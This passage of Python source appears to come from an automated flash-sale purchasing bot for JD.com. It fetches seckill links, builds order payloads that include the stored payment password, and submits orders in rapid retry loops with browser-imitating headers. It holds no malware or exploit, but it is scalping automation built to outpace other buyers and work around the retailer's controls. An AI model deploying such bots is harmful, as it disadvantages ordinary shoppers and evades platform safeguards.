下单重复执行次数,可选参数,默认4次 :param interval: 下单执行间隔,可选参数,默认5秒 :return: """ t = Timer(buy_time=buy_time) t.start() for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) if self.submit_order(): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') @check_login def get_order_info(self, unpaid=True): """查询订单信息 :param unpaid: 只显示未付款订单,可选参数,默认为True :return: """ url = 'https://order.jd.com/center/list.action' payload = { 'search': 0, 'd': 1, 's': 4096, } # Orders for nearly three months headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/uc/login?ltype=logout', } try: resp = self.sess.get(url=url, params=payload, headers=headers) if not response_status(resp): logger.error('获取订单页信息失败') return soup = BeautifulSoup(resp.text, "html.parser") logger.info('************************订单列表页查询************************') order_table = soup.find('table', {'class': 'order-tb'}) table_bodies = order_table.select('tbody') exist_order = False for table_body in 
table_bodies: # get order status order_status = get_tag_value(table_body.select('span.order-status')).replace("订单状态:", "") # check if order is waiting for payment # wait_payment = bool(table_body.select('a.btn-pay')) wait_payment = "等待付款" in order_status # only show unpaid orders if unpaid=True if unpaid and (not wait_payment): continue exist_order = True # get order_time, order_id tr_th = table_body.select('tr.tr-th')[0] order_time = get_tag_value(tr_th.select('span.dealtime')) order_id = get_tag_value(tr_th.select('span.number a')) # get sum_price, pay_method sum_price = '' pay_method = '' amount_div = table_body.find('div', {'class': 'amount'}) if amount_div: spans = amount_div.select('span') pay_method = get_tag_value(spans, index=1) # if the order is waiting for payment, the price after the discount is shown. sum_price = get_tag_value(amount_div.select('strong'), index=1)[1:] if wait_payment \ else get_tag_value(spans, index=0)[4:] # get name and quantity of items in order items_dict = dict() # {'item_id_1': quantity_1, 'item_id_2': quantity_2, ...} tr_bds = table_body.select('tr.tr-bd') for tr_bd in tr_bds: item = tr_bd.find('div', {'class': 'goods-item'}) if not item: break item_id = item.get('class')[1][2:] quantity = get_tag_value(tr_bd.select('div.goods-number'))[1:] items_dict[item_id] = quantity order_info_format = '下单时间:{0}----订单号:{1}----商品列表:{2}----订单状态:{3}----总金额:{4}元----付款方式:{5}' logger.info(order_info_format.format(order_time, order_id, parse_items_dict(items_dict), order_status, sum_price, pay_method)) if not exist_order: logger.info('订单查询为空') except Exception as e: logger.error(e) @deprecated def _get_seckill_url(self, sku_id, server_buy_time=int(time.time())): """获取商品的抢购链接 点击"抢购"按钮后,会有两次302跳转,最后到达订单结算页面 这里返回第一次跳转后的页面url,作为商品的抢购链接 :param sku_id: 商品id :return: 商品的抢购链接 """ url = 'https://itemko.jd.com/itemShowBtn' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'from': 'pc', '_': str(server_buy_time * 1000), } headers = { 'User-Agent': self.user_agent, 'Host': 'itemko.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } retry_interval = global_config.retry_interval retry_count = 0 while retry_count < 10: resp = self.sess.get(url=url, headers=headers, params=payload, timeout=(0.1, 0.08)) resp_json = parse_json(resp.text) if resp_json.get('url'): # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc router_url = 'https:' + resp_json.get('url') # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 logger.info("第%s次获取抢购链接失败,%s不是抢购商品或抢购页面暂未刷新,%s秒后重试", retry_count, sku_id, retry_interval) time.sleep(retry_interval) logger.error("抢购链接获取失败,终止抢购!") exit(-1) def request_seckill_url(self, sku_id, server_buy_time): """访问商品的抢购链接(用于设置cookie等) :param sku_id: 商品id :return: """ if not self.seckill_url.get(sku_id): seckill_url = self.request_info['get_sku_seckill_url_request'](sku_id, server_buy_time) if seckill_url is not None: self.seckill_url[sku_id] = seckill_url else: return None return self.request_info['request_sku_seckill_url_request'](sku_id) @deprecated def request_seckill_checkout_page(self, sku_id, num=1): """访问抢购订单结算页面 :param sku_id: 商品id :param num: 购买数量,可选参数,默认1个 :return: """ url = 'https://marathon.jd.com/seckill/seckill.action' payload = { 'skuId': sku_id, 
'num': num, 'rid': int(time.time()) } headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } self.sess.get(url=url, params=payload, headers=headers, timeout=(0.1, 0.08)) def _get_seckill_init_info(self, sku_id, num=1): """获取秒杀初始化信息(包括:地址,发票,token) :param sku_id: :param num: 购买数量,可选参数,默认1个 :return: 初始化信息组成的dict """ count = 1 while count < 8: logger.info('第 %s 次获取秒杀初始化信息', count) content = self.request_info['get_seckill_init_info_request'](sku_id, num) try: if 'koFail' in content: logger.error('抢购失败,请求重定向,地址:%s', content) else: return parse_json(content) except Exception as e: logger.error('获取秒杀初始化信息失败,响应数据:%s,异常:%s', content, e) count += 1 def _gen_seckill_order_data(self, sku_id, num=1): """生成提交抢购订单所需的请求体参数 :param sku_id: 商品id :param num: 购买数量,可选参数,默认1个 :return: 请求体参数组成的dict """ # 获取用户秒杀初始化信息 init_info = self.seckill_init_info.get(sku_id) if not init_info: init_info = self._get_seckill_init_info(sku_id) self.seckill_init_info[sku_id] = init_info default_address = init_info['addressList'][0] # 默认地址dict invoice_info = init_info.get('invoiceInfo', {}) # 默认发票信息dict, 有可能不返回 token = init_info['token'] data = { 'skuId': sku_id, 'num': num, 'addressId': default_address['id'], 'yuShou': str(bool(int(init_info['seckillSkuVO']['extMap'].get('YuShou', '0')))).lower(), 'isModifyAddress': 'false', 'name': default_address['name'], 'provinceId': default_address['provinceId'], 'cityId': default_address['cityId'], 'countyId': default_address['countyId'], 'townId': default_address['townId'], 'addressDetail': default_address['addressDetail'], 'mobile': default_address['mobile'], 'mobileKey': default_address['mobileKey'], 'email': default_address.get('email', ''), 'postCode': '', 'invoiceTitle': invoice_info.get('invoiceTitle', -1), 'invoiceCompanyName': '', 'invoiceContent': invoice_info.get('invoiceContentType', 1), 'invoiceTaxpayerNO': '', 'invoiceEmail': '', 'invoicePhone': invoice_info.get('invoicePhone', ''), 'invoicePhoneKey': invoice_info.get('invoicePhoneKey', ''), 'invoice': 'true' if invoice_info else 'false', 'password': global_config.get('account', 'payment_pwd'), 'codTimeType': 3, 'paymentType': 4, 'areaCode': '', 'overseas': 0, 'phone': '', 'eid': self.eid, 'fp': self.fp, 'token': token, 'pru': '' } return data def exec_seckill(self, sku_id, server_buy_time=int(time.time()), retry=4, interval=4, num=1, fast_mode=True): """立即抢购 抢购商品的下单流程与普通商品不同,不支持加入购物车,可能需要提前预约,主要执行流程如下: 1. 访问商品的抢购链接 2. 访问抢购订单结算页面(好像可以省略这步,待测试) 3. 
提交抢购(秒杀)订单 :param sku_id: 商品id :param server_buy_time: 商品指定抢购时间 :param retry: 抢购重复执行次数,可选参数,默认4次 :param interval: 抢购执行间隔,可选参数,默认4秒 :param num: 购买数量,可选参数,默认1个 :param fast_mode: 快速模式:略过访问抢购订单结算页面这一步骤,默认为 True :return: 抢购结果 True/False """ for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试抢购商品:%s', count, retry, sku_id) if not fast_mode: # 访问抢购订单结算页面 self.request_info['request_seckill_checkout_page_request'](sku_id, num) if self.request_info['submit_seckill_order_request'](sku_id, server_buy_time, num): return True else: logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,抢购%s失败!', sku_id) return False @check_login def exec_seckill_by_time(self, config): """预约抢购 """ if not config: raise AsstException('初始化配置为空!') self.config = config # 兼容正常流程:开抢前清空购物车 self.clear_cart() items_dict = parse_sku_id(sku_ids=config.sku_id) if self.use_new: server_buy_time, realy_buy_time = self.new_init_seckill_request_method(config.fast_mode, config.is_risk_control) else: # 1.提前初始化预约抢购流程请求信息、方法 server_buy_time, realy_buy_time = self.init_seckill_request_method(config.fast_mode, config.is_risk_control) # 兼容正常流程:初始化正常下单流程请求信息、方法 self.init_default_order_request_method(config.fast_mode, config.is_risk_control) Timer.setSystemTime() # 使用多线程需要从倒计时前开始,后续流程都使用多线程执行 if self.use_new: get_confirm_order_page_request = self.request_info['get_confirm_order_page_request'] submit_order_request = self.request_info['submit_order_request'] def start_func(): # 订单请求页面 for sku_id in items_dict: logger.info('开始抢购商品:%s', sku_id) submit_data = get_confirm_order_page_request(sku_id, server_buy_time) if submit_data is not None: retry = config.retry interval = config.interval for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) with self.sem: # 下单请求 if submit_order_request(submit_data, count): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') continue else: return None else: def start_func(): # 使用协程/多线程从执行开始 # 3.执行 for sku_id in items_dict: logger.info('开始抢购商品:%s', sku_id) # 获取抢购链接 resp = self.request_seckill_url(sku_id, server_buy_time) if resp is not None: if resp == 'pass': pass elif resp.status == 302: location = resp.headers['location'] logger.info('访问商品抢购链接请求,重定向地址:%s', location) if 'gate.action' in location: # 此处转入正常购物车下单流程 add_cart_request = self.request_info['add_cart_request'] payload = { 'pid': sku_id, 'pcount': config.num, 'ptype': 1, } add_cart_request(payload) # 获取订单结算页面信息 self.get_checkout_page_detail() retry = config.retry interval = config.interval for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) with self.sem: if self.submit_order(): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') continue # 开始抢购 self.exec_seckill(sku_id, server_buy_time, config.retry, config.interval, int(items_dict[sku_id]), config.fast_mode) self.start_func = start_func # 2.倒计时 logger.info('准备抢购商品:%s', list(items_dict.keys())) Timer(buy_time=realy_buy_time, sleep_interval=config.sleep_interval, fast_sleep_interval=config.fast_sleep_interval, is_sync=False, assistant=self).start() if self.config.fast_mode: self.close_now() def new_parse_item_detail_page(self, sku_id, html): match = re.search(r'"zzz":\"(.*)\"', html) if not match: return False zzz = match.group(1) if zzz is None: return False self.item_zzz[sku_id] = zzz area_id_list = list(map(lambda x: x.strip(), re.split('_|-', self.area_id))) area_url = '' if len(area_id_list) > 2: area_url = area_id_list[0] + '-' + area_id_list[1] + 
'-' + area_id_list[2] item_url_param = 'sceneval=2&bid=&scene=jd&isCanEdit=1&EncryptInfo=&Token=&type=0&lg=0&supm=0&locationid=' + area_url + '&favorablerate=94' self.item_url_param[sku_id] = item_url_param return True def parse_item_detail_page(self, sku_id, page): match = re.search(r'cat: \[(.*?)\]', page.text) cat = match.group(1) if not cat: return False self.item_cat[sku_id] = cat match = re.search(r'venderId:(\d*?),', page.text) vender_id = match.group(1) self.item_vender_ids[sku_id] = vender_id match = re.search(r'paramJson:( ?)\'(\{.*\})\'', page.text) param_json = match.group(1) if not param_json or param_json == '' or param_json == ' ': param_json = match.group(2) if not param_json: param_json = '' self.param_json[sku_id] = param_json match = re.search(r'specialAttrs:( ?)(\[.*\])', page.text) special_attrs_str = match.group(1) if not special_attrs_str or special_attrs_str == '' or special_attrs_str == ' ': special_attrs_str = match.group(2) if special_attrs_str: special_attrs = json.loads(special_attrs_str) else: special_attrs = [] self.special_attrs[sku_id] = special_attrs return True def new_init_yuyue_buy_time(self, sku_id=None, html=None): config = self.config logger.info('初始化预约抢购时间') # 处理时间 server_buy_datetime = None if config.sku_buy_time: # 根据配置初始化 server_buy_datetime = datetime.strptime(config.sku_buy_time, "%Y-%m-%d %H:%M:%S.%f") else: # 自动获取 match = re.search(r'"yuyue":({.*})', html) if match: yuyue = match.group(1) if yuyue: yuyue_json = parse_json(yuyue) buy_start_time = yuyue_json['qiangStime'] if buy_start_time: buy_end_time = yuyue_json['qiangEtime'] server_buy_datetime = datetime.strptime(buy_start_time, "%Y-%m-%d %H:%M:%S") logger.info('商品%s预约抢购,开始时间:%s,结束时间:%s', sku_id, buy_start_time, buy_end_time) else: logger.debug(f"响应数据:{html}") logger.info("商品%s无法获取预约抢购时间,请重新设置sku_id", sku_id) exit(-1) else: logger.info("商品%s不是 预约抢购商品 或 未开始预约,请重新设置sku_id", sku_id) exit(-1) return int(time.mktime(server_buy_datetime.timetuple())), ( server_buy_datetime + timedelta(milliseconds=-config.buy_time_offset)).strftime( "%Y-%m-%d %H:%M:%S.%f") def init_yuyue_buy_time(self, sku_id=None, header=None, payload=None): if header is None: header = dict() config = self.config logger.info('初始化预约抢购时间') # 处理时间 server_buy_datetime = None if config.sku_buy_time: # 根据配置初始化 server_buy_datetime = datetime.strptime(config.sku_buy_time, "%Y-%m-%d %H:%M:%S.%f") else: # 自动初始化 header['Host'] = 'itemko.jd.com' header['Referer'] = 'https://item.jd.com/' resp = http_util.send_http_request(self.socket_client, url='https://item-soa.jd.com/getWareBusiness', method='GET', headers=header, params=payload, cookies=self.get_cookies_str_by_domain_or_path( 'item-soa.jd.com')) resp_data = resp.body resp_json = parse_json(resp_data) yuyue_info = resp_json.get('yuyueInfo') if yuyue_info: buy_time = yuyue_info.get('buyTime') if buy_time: buy_time_list = re.findall(r'\d{4}-\d{1,2}-\d{1,2} \d{1,2}:\d{1,2}', buy_time.strip()) if buy_time_list and len(buy_time_list) == 2: buy_start_time = buy_time_list[0] buy_end_time = buy_time_list[1] server_buy_datetime = datetime.strptime(buy_start_time, "%Y-%m-%d %H:%M") logger.info('商品%s预约抢购,开始时间:%s,结束时间:%s', sku_id, buy_start_time, buy_end_time) else: if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s无法获取预约抢购时间,请重新设置sku_id", sku_id) exit(-1) else: if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s无法获取预约抢购时间,请重新设置sku_id", sku_id) exit(-1) else: logger.info("商品%s不是 预约抢购商品 或 未开始预约,请重新设置sku_id", sku_id) exit(-1) return 
int(time.mktime(server_buy_datetime.timetuple())), ( server_buy_datetime + timedelta(milliseconds=-config.buy_time_offset)).strftime( "%Y-%m-%d %H:%M:%S.%f") def init_seckill_request_method(self, fast_mode, is_risk_control): # 提前初始化请求信息、方法 # self.get_and_update_cookies_str() config = self.config sku_id = config.sku_id area_id = parse_area_id(self.area_id) cat = self.item_cat.get(sku_id) retry_count = 0 while not cat: retry_count += 1 logger.info('第 %s 次获取商品页信息', retry_count) page = self._get_item_detail_page(sku_id) if not self.parse_item_detail_page(sku_id, page): if retry_count > 10: logger.error('无法获取cat,超出重试次数,抢购停止') exit(-1) else: logger.error('第 %s 次获取商品页信息失败:%s', page) time.sleep(1) continue else: cat = self.item_cat.get(sku_id) vender_id = self.item_vender_ids.get(sku_id) param_json = self.param_json.get(sku_id) special_attrs = self.special_attrs.get(sku_id) # 初始化预约抢购时间 server_buy_time, realy_buy_time = self.init_yuyue_buy_time(sku_id, self.headers.copy(), { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'cat': cat, 'area': area_id, 'shopId': vender_id, 'venderId': vender_id, 'paramJson': param_json, 'num': 1, }) # 初始化获取商品抢购链接请求方法 get_sku_seckill_url_request_headers = self.headers.copy() if fast_mode: get_sku_seckill_url_request_headers['Host'] = 'itemko.jd.com' if 'isKO' in special_attrs: def get_sku_seckill_url_request(sku_id, server_buy_time=int(time.time())): logger.info('获取抢购链接') payload = { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'from': 'pc', '_': str(server_buy_time * 1000), } get_sku_seckill_url_request_headers['Referer'] = f'https://item.jd.com/{sku_id}.html' retry_interval = config.retry_interval retry_count = 0 while not self.seckill_url.get(sku_id): if retry_count >= 10: logger.error("抢购链接获取失败,终止抢购!") exit(-1) try: resp = http_util.send_http_request(self.socket_client, url='https://itemko.jd.com/itemShowBtn', method='GET', headers=get_sku_seckill_url_request_headers, params=payload , cookies=self.get_cookies_str_by_domain_or_path( 'itemko.jd.com')) resp_data = resp.body resp_json = parse_json(resp_data) if resp_json.get('url'): # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc router_url = 'https:' + resp_json.get('url') # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s第%s次获取抢购链接失败,链接为空,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) except Exception as e: retry_count += 1 logger.error("异常信息:%s", e) logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) else: def get_sku_seckill_url_request(sku_id, server_buy_time=int(time.time())): logger.info('获取抢购链接') payload = { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'cat': cat, 'area': area_id, 'shopId': vender_id, 'venderId': vender_id, 'paramJson': param_json, 'num': 1, } get_sku_seckill_url_request_headers['Referer'] = 'https://item.jd.com/' retry_interval = config.retry_interval retry_count = 0 while not self.seckill_url.get(sku_id): if retry_count >= 10: logger.error("抢购链接获取失败,终止抢购!") exit(-1) try: resp = http_util.send_http_request(self.socket_client, url='https://item-soa.jd.com/getWareBusiness', 
method='GET', headers=get_sku_seckill_url_request_headers, params=payload, cookies=self.get_cookies_str_by_domain_or_path( 'item-soa.jd.com')) resp_data = resp.body resp_json = parse_json(resp_data) yuyue_info = resp_json.get('yuyueInfo') if yuyue_info: # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc url = yuyue_info.get('url') if url: if 'toYuyue.action' in url: retry_count += 1 logger.info("商品%s正在预约中,暂未开始抢购,开始第%s次重试", sku_id, retry_count) continue router_url = 'https:' + url # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s第%s次获取抢购链接失败,链接为空,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) else: if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s不是 预约抢购商品 或 未开始预约,本次抢购结束", sku_id) exit(-1) except Exception as e: retry_count += 1 logger.error("异常信息:%s", e) logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) return None else: def get_sku_seckill_url_request(sku_id, server_buy_time=int(time.time())): url = 'https://itemko.jd.com/itemShowBtn' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'from': 'pc', '_': str(server_buy_time * 1000), } headers = { 'User-Agent': self.user_agent, 'Host': 'itemko.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } retry_interval = 0.2 retry_count = 0 while retry_count < 10: try: resp = self.sess.get(url=url, headers=headers, params=payload, timeout=(0.1, 0.08)) resp_json = parse_json(resp.text) if resp_json.get('url'): # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc router_url = 'https:' + resp_json.get('url') # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 if resp.text: logger.info(f"响应数据:{resp.text}") logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) except Exception as e: retry_count += 1 logger.info("异常信息:%s", e) logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) logger.error("抢购链接获取失败,终止抢购!") exit(-1) self.request_info['get_sku_seckill_url_request'] = get_sku_seckill_url_request # 初始化访问商品抢购链接请求方法(用于设置cookie等) request_sku_seckill_url_request_headers = self.headers.copy() if fast_mode: request_sku_seckill_url_request_headers['Host'] = 'marathon.jd.com' def request_sku_seckill_url_request(sku_id): logger.info('访问商品抢购链接请求') request_sku_seckill_url_request_headers['Referer'] = f'https://item.jd.com/{sku_id}.html' url = self.seckill_url.get(sku_id) is_pass = self.is_request_seckill_url.get(sku_id) if not is_pass: resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=request_sku_seckill_url_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'marathon.jd.com')) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() self.is_request_seckill_url[sku_id] = 'pass' return resp else: return is_pass else: 
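        # Fallback branch (fast_mode disabled): the function defined below visits the
        # previously fetched seckill URL through the plain requests session, without
        # following redirects, so that the marathon.jd.com cookies get set; the fast
        # path above does the same through the raw socket connection pool instead.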
def request_sku_seckill_url_request(sku_id): headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } return self.sess.get(url=self.seckill_url.get(sku_id), headers=headers, allow_redirects=False, timeout=(0.1, 0.08)) self.request_info['request_sku_seckill_url_request'] = request_sku_seckill_url_request # 初始化访问抢购订单结算页面请求方法 request_seckill_checkout_page_request_headers = self.headers.copy() # if fast_mode and is_risk_control is False: if fast_mode: # request_seckill_checkout_page_request_headers['cookie'] = self.cookies_str request_seckill_checkout_page_request_headers['Host'] = 'marathon.jd.com' def request_seckill_checkout_page_request(sku_id, num): logger.info('抢购订单结算页面请求') url = 'https://marathon.jd.com/seckill/seckill.action' request_sku_seckill_url_request_headers['Referer'] = f'https://item.jd.com/{sku_id}.html' is_pass = self.is_seckill_checkout_page.get(sku_id) if not is_pass: resp = http_util.send_http_request(self.socket_client, url=url, method='GET', params={ 'skuId': sku_id, 'num': num, 'rid': int(time.time()) }, headers=request_seckill_checkout_page_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'marathon.jd.com')) logger.info(resp.body) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() self.is_seckill_checkout_page[sku_id] = True return resp else: return is_pass else: def request_seckill_checkout_page_request(sku_id, num): url = 'https://marathon.jd.com/seckill/seckill.action' payload = { 'skuId': sku_id, 'num': num, 'rid': int(time.time()) } headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } self.sess.get(url=url, params=payload, headers=headers, timeout=(0.1, 0.08)) self.request_info['request_seckill_checkout_page_request'] = request_seckill_checkout_page_request # 初始化获取秒杀初始化信息请求方法(包括:地址,发票,token) get_seckill_init_info_request_headers = self.headers.copy() if fast_mode: # get_seckill_init_info_request_headers['cookie'] = self.cookies_str get_seckill_init_info_request_headers['Host'] = 'marathon.jd.com' def get_seckill_init_info_request(sku_id, num=1): url = 'https://marathon.jd.com/seckillnew/orderService/pc/init.action' resp = http_util.send_http_request(self.socket_client, url=url, method='POST', data={ 'sku': sku_id, 'num': num, 'isModifyAddress': 'false', }, headers=get_seckill_init_info_request_headers, cookies=self.get_cookies_str_by_domain_or_path('marathon.jd.com')) # logger.info(resp.body) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) if resp.status == 302: return resp.headers['location'] # self.get_and_update_cookies_str() return resp.body else: def get_seckill_init_info_request(sku_id, num=1): url = 'https://marathon.jd.com/seckillnew/orderService/pc/init.action' data = { 'sku': sku_id, 'num': num, 'isModifyAddress': 'false', } headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', } return self.sess.post(url=url, data=data, headers=headers).text self.request_info['get_seckill_init_info_request'] = get_seckill_init_info_request # 初始化提交抢购(秒杀)订单请求方法 submit_seckill_order_request_headers = self.headers.copy() if fast_mode: # submit_seckill_order_request_headers['cookie'] = cookie_str submit_seckill_order_request_headers['Host'] = 'marathon.jd.com' def submit_seckill_order_request(sku_id=None, server_buy_time=int(time.time()), num=1): logger.info('提交抢购(秒杀)订单请求') url = 
'https://marathon.jd.com/seckillnew/orderService/pc/submitOrder.action' submit_seckill_order_request_headers[ 'Referer'] = f'https://marathon.jd.com/seckill/seckill.action?skuId={sku_id}&num={num}&rid={server_buy_time} ' if not self.seckill_order_data.get(sku_id): self.seckill_order_data[sku_id] = self._gen_seckill_order_data(sku_id, num) retry_interval = 0.1 retry_count = 0 while retry_count < 10: resp_json = None try: resp = http_util.send_http_request(self.socket_client, url=url, method='POST', params={'skuId': sku_id}, data=self.seckill_order_data.get(sku_id), headers=submit_seckill_order_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'marathon.jd.com')) body = resp.body logger.info(body) resp_json = parse_json(body) except Exception as e: logger.error('秒杀请求出错:%s', str(e)) retry_count += 1 time.sleep(retry_interval) # 返回信息 # 抢购失败: # {'errorMessage': '很遗憾没有抢到,再接再厉哦。', 'orderId': 0, 'resultCode': 60074, 'skuId': 0, 'success': False} # {'errorMessage': '抱歉,您提交过快,请稍后再提交订单!', 'orderId': 0, 'resultCode': 60017, 'skuId': 0, 'success': False} # {'errorMessage': '系统正在开小差,请重试~~', 'orderId': 0, 'resultCode': 90013, 'skuId': 0, 'success': False} # 抢购成功: # {"appUrl":"xxxxx","orderId":820227xxxxx,"pcUrl":"xxxxx","resultCode":0,"skuId":0,"success":true,"totalMoney":"xxxxx"} if resp_json.get('success'): order_id = resp_json.get('orderId') total_money = resp_json.get('totalMoney') pay_url = 'https:' + resp_json.get('pcUrl') logger.info('抢购成功,订单号: %s, 总价: %s, 电脑端付款链接: %s', order_id, total_money, pay_url) return True else: logger.info('抢购失败,返回信息: %s', resp_json) retry_count += 1 time.sleep(retry_interval) return False else: def submit_seckill_order_request(sku_id, server_buy_time=int(time.time()), num=1): url = 'https://marathon.jd.com/seckillnew/orderService/pc/submitOrder.action' payload = { 'skuId': sku_id, } if not self.seckill_order_data.get(sku_id): self.seckill_order_data[sku_id] = self._gen_seckill_order_data(sku_id, num) headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://marathon.jd.com/seckill/seckill.action?skuId={0}&num={1}&rid={2}'.format( sku_id, num, server_buy_time), } retry_interval = 0.1 retry_count = 0 while retry_count < 10: resp_json = None try: resp = self.sess.post(url=url, headers=headers, params=payload, data=self.seckill_order_data.get(sku_id), timeout=(0.1, 0.08)) logger.info(resp.text) resp_json = parse_json(resp.text) except Exception as e: logger.error('秒杀请求出错:%s', str(e)) retry_count += 1 time.sleep(retry_interval) # 返回信息 # 抢购失败: # {'errorMessage': '很遗憾没有抢到,再接再厉哦。', 'orderId': 0, 'resultCode': 60074, 'skuId': 0, 'success': False} # {'errorMessage': '抱歉,您提交过快,请稍后再提交订单!', 'orderId': 0, 'resultCode': 60017, 'skuId': 0, 'success': False} # {'errorMessage': '系统正在开小差,请重试~~', 'orderId': 0, 'resultCode': 90013, 'skuId': 0, 'success': False} # 抢购成功: # {"appUrl":"xxxxx","orderId":820227xxxxx,"pcUrl":"xxxxx","resultCode":0,"skuId":0,"success":true,"totalMoney":"xxxxx"} if resp_json.get('success'): order_id = resp_json.get('orderId') total_money = resp_json.get('totalMoney') pay_url = 'https:' + resp_json.get('pcUrl') logger.info('抢购成功,订单号: %s, 总价: %s, 电脑端付款链接: %s', order_id, total_money, pay_url) return True else: logger.info('抢购失败,返回信息: %s', resp_json) retry_count += 1 time.sleep(retry_interval) return False self.request_info['submit_seckill_order_request'] = submit_seckill_order_request return server_buy_time, realy_buy_time def new_init_seckill_request_method(self, fast_mode, is_risk_control): # 提前初始化请求信息、方法 # 
self.get_and_update_cookies_str() config = self.config sku_id = config.sku_id zzz = self.item_zzz.get(sku_id) retry_count = 0 item_page_resp = self.new_get_item_detail_page(sku_id) item_page = item_page_resp.text while zzz is None: retry_count += 1 logger.info('加载订单') if not self.new_parse_item_detail_page(sku_id, item_page): if retry_count > 10: logger.error('无法获取zzz,超出重试次数,抢购停止') exit(-1) else: logger.error('第 %s 次加载订单失败', retry_count) retry_count += 1 time.sleep(1) if item_page_resp.status_code != requests.codes.OK or not item_page: item_page_resp = self.new_get_item_detail_page(sku_id) item_page = item_page_resp.text continue else: zzz = self.item_zzz.get(sku_id) area_id = parse_area_id(self.area_id) vender_id = self.item_vender_ids.get(sku_id) param_json = self.param_json.get(sku_id) special_attrs = self.special_attrs.get(sku_id) # 初始化预约抢购时间 server_buy_time, realy_buy_time = self.new_init_yuyue_buy_time(sku_id, item_page) if server_buy_time > int(time.time()): hasYuyue_match = re.search(r'"hasYuyue":"(.*)"', item_page) if hasYuyue_match: hasYuyue = hasYuyue_match.group(1) if hasYuyue == '0' or hasYuyue == 0: self.new_reserve(sku_id) elif hasYuyue == '1' or hasYuyue == 1: logger.info('商品已预约,跳过自动预约') else: logger.info('商品已开售,跳过自动预约') # 初始化加载订单请求方法 if fast_mode: get_confirm_order_page_request_headers = self.headers.copy() get_confirm_order_page_request_headers['Host'] = 'wq.jd.com' get_confirm_order_page_request_headers['dnt'] = '1' get_confirm_order_page_request_headers['referer'] = 'https://item.m.jd.com/' get_confirm_order_page_request_headers['sec-fetch-dest'] = 'document' get_confirm_order_page_request_headers['sec-fetch-mode'] = 'navigate' get_confirm_order_page_request_headers['sec-fetch-site'] = 'same-site' get_confirm_order_page_request_headers['sec-fetch-user'] = '?1' get_confirm_order_page_request_headers['upgrade-insecure-requests'] = '1' 